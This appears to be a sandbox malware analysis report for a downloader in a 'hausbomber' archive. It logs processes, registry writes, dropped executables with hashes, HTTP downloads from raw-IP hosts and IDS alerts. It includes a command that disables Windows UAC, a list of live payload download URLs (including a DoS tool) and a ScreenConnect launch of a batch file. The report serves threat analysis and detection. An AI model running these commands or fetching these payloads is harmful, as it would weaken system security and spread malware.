c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\advapi32.dll
768"C:\Program Files (x86)\ScreenConnect Client (6fb02e5078751831)\ScreenConnect.WindowsClient.exe" "RunFile" "C:\Users\admin\Documents\ScreenConnect\Temp\MentosBoss.bat"C:\Program Files (x86)\ScreenConnect Client (6fb02e5078751831)\ScreenConnect.WindowsClient.exeScreenConnect.WindowsClient.exe
User:
admin
Company:
ScreenConnect Software
Integrity Level:
MEDIUM
Description:
ScreenConnect Client
Exit code:
0
Version:
24.3.7.9067
Modules
Images
c:\program files (x86)\screenconnect client (6fb02e5078751831)\screenconnect.windowsclient.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
780"C:\Users\admin\Desktop\hausbomber\Files\ddosziller.exe" C:\Users\admin\Desktop\hausbomber\Files\ddosziller.exe
4363463463464363463463463.exe
User:
admin
Integrity Level:
HIGH
Exit code:
0
Version:
1.0.0.0
Modules
Images
c:\users\admin\desktop\hausbomber\files\ddosziller.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\mscoree.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
856reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t reg_dword /d 0 /F C:\Windows\System32\reg.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
HIGH
Description:
Registry Console Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\reg.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\ws2_32.dll
Total events
248 140
Read events
244 308
Write events
3 704
Delete events
128

Modification events

(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:3
Value:
C:\Users\admin\Desktop\preferences.zip
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:2
Value:
C:\Users\admin\Desktop\chromium_ext.zip
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:1
Value:
C:\Users\admin\Desktop\omni_23_10_2024_.zip
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\hausbomber.zip
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:15
Value:
(PID) Process:(6372) WinRAR.exeKey:HKEY_CURRENT_USER\SOFTWARE\WinRAR\DialogEditHistory\ExtrPath
Operation:delete valueName:14
Value:
Executable files
613
Suspicious files
999
Text files
386
Unknown types
0

Dropped files

PID
Process
Filename
Type
6372WinRAR.exeC:\Users\admin\Desktop\hausbomber\4363463463464363463463463.exe.binexecutable
MD5:2A94F3960C58C6E70826495F76D00B85
SHA256:2FCAD226B17131DA4274E1B9F8F31359BDD325C9568665F08FD1F6C5D06A23CE
46084363463463464363463463463.exeC:\Users\admin\Desktop\hausbomber\Files\koko4.exehtml
MD5:82ED3DC33CD71025510A05B664EB558B
SHA256:F088B073091FFCA7CA0063658E01021738BE4665C4407BA475A8B9774E1B1CCB
46084363463463464363463463463.exeC:\Users\admin\Desktop\hausbomber\Files\svchost.exeexecutable
MD5:B373C11C594E3A3F2230860496F2507B
SHA256:2754CF43D44358046721E9FBD6CB1447154CC9F9DA62349E54576327FF3A5B02
46084363463463464363463463463.exeC:\Users\admin\Desktop\hausbomber\Files\ComplexDoS.exehtml
MD5:EA06B65498F0FD58E14B8EB30A860DCC
SHA256:6098D8EAF10B32F8881C56BAD9D5B5B20074B2CA27E4492D0A6170F9382B39C0
46084363463463464363463463463.exeC:\Users\admin\Desktop\hausbomber\Files\td.exeexecutable
MD5:2C633C38BDD318467A5D0D0C56118308
SHA256:81711D5F01C04629384F81B89C1C45CECCFEACBC79563F4345C93BD4FAFE9E75
46084363463463464363463463463.exeC:\Users\admin\Desktop\hausbomber\Files\02.08.2022.exebinary
MD5:4CAB7C7FAC6B65B25BEC6E62B57ADCD1
SHA256:BD65AC176DCB36EF0589C56406F8145E6086672F9BCFED5D8133627F787BD23F
5404td.exeC:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource\BtnExperiences.pngimage
MD5:66B21F4FD1C57E27F014E147B837FD13
SHA256:E5EADB2A0347CB28E5BF8717E899C2BBDAFC634A0C2E518EBD185EF51786EAEB
5404td.exeC:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource.zipcompressed
MD5:86370E89DD5E40065D5EEDD15EC67EE5
SHA256:2925665C56B9DCF270618290151832648B0ABE8E3452C01FB6998B4F01EFEECA
5404td.exeC:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource\CheckButton.pngimage
MD5:EA80F053D52919721F2B22175F53EA61
SHA256:C0F522A354E32F89C661A57529AAAA607D6C37DF394C3982BA5EFAA1E5D1F86A
5404td.exeC:\Users\admin\AppData\Local\Temp\Thunder7Install\7.10.34.360\InstallResource\CustomBtn.pngimage
MD5:22409973498302B3DAA3C60696295E69
SHA256:9EBB2578CE9F7C5091833A3FFEF861399110CD668BC35F1008610ED2C6C2BB83
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
155
TCP/UDP connections
3 886
DNS requests
611
Threats
819

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
200
23.48.23.141:80
http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
unknown
whitelisted
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl
unknown
whitelisted
6544
svchost.exe
GET
200
2.17.190.73:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
whitelisted
6148
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl
unknown
whitelisted
4608
4363463463464363463463463.exe
GET
200
43.142.161.126:8889
http://43.142.161.126:8889/02.08.2022.exe
unknown
unknown
6148
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
whitelisted
4608
4363463463464363463463463.exe
GET
200
51.195.19.98:80
http://irib-zx.persiangig.com/.uWpPAmYayO/DDOS/ComplexDoS.exe
unknown
unknown
4608
4363463463464363463463463.exe
GET
200
63.142.242.120:80
http://63.142.242.120/td.exe
unknown
unknown
4608
4363463463464363463463463.exe
GET
200
62.109.140.53:80
http://kokopellz.4fan.cz/koko4.exe
unknown
whitelisted
4608
4363463463464363463463463.exe
GET
200
211.204.100.20:1234
http://211.204.100.20:1234/winsetaccess64.exe
unknown
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
4.231.128.59:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
23.48.23.141:80
crl.microsoft.com
Akamai International B.V.
DE
whitelisted
184.30.21.171:80
www.microsoft.com
AKAMAI-AS
DE
whitelisted
4
System
192.168.100.255:138
whitelisted
3216
svchost.exe
172.211.123.249:443
client.wns.windows.com
MICROSOFT-CORP-MSN-AS-BLOCK
FR
whitelisted
6544
svchost.exe
20.190.159.75:443
login.live.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6544
svchost.exe
2.17.190.73:80
ocsp.digicert.com
AKAMAI-AS
DE
whitelisted
2104
svchost.exe
51.124.78.146:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
NL
whitelisted
6148
SIHClient.exe
4.175.87.197:443
slscr.update.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 4.231.128.59
  • 51.124.78.146
whitelisted
crl.microsoft.com
  • 23.48.23.141
  • 23.48.23.193
  • 23.48.23.177
  • 23.48.23.180
  • 23.48.23.164
whitelisted
www.microsoft.com
  • 184.30.21.171
whitelisted
google.com
  • 142.250.185.174
whitelisted
client.wns.windows.com
  • 172.211.123.249
  • 172.211.123.250
whitelisted
login.live.com
  • 20.190.159.75
  • 20.190.159.68
  • 40.126.31.73
  • 40.126.31.71
  • 20.190.159.131
  • 40.126.31.131
  • 40.126.31.128
  • 20.190.159.128
  • 40.126.31.69
  • 40.126.31.130
  • 40.126.31.67
  • 20.190.159.23
  • 40.126.31.3
  • 20.190.159.71
whitelisted
ocsp.digicert.com
  • 2.17.190.73
whitelisted
slscr.update.microsoft.com
  • 4.175.87.197
whitelisted
fe3cr.delivery.mp.microsoft.com
  • 20.242.39.171
whitelisted
urlhaus.abuse.ch
  • 151.101.130.49
  • 151.101.2.49
  • 151.101.194.49
  • 151.101.66.49
whitelisted

Threats

PID
Process
Class
Message
2196
svchost.exe
Misc activity
ET INFO DNS Query to Alibaba Cloud CDN Domain (aliyuncs .com)
4608
4363463463464363463463463.exe
Misc activity
ET INFO Observed Alibaba Cloud CDN Domain (aliyuncs .com in TLS SNI)
4608
4363463463464363463463463.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
4608
4363463463464363463463463.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
4608
4363463463464363463463463.exe
Potentially Bad Traffic
ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
4608
4363463463464363463463463.exe
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
4608
4363463463464363463463463.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
4608
4363463463464363463463463.exe
Potentially Bad Traffic
ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response
5404
td.exe
A Network Trojan was detected
ET USER_AGENTS Suspicious User-Agent (HTTP Downloader)
4608
4363463463464363463463463.exe
Potentially Bad Traffic
ET INFO Executable Download from dotted-quad Host
No debug info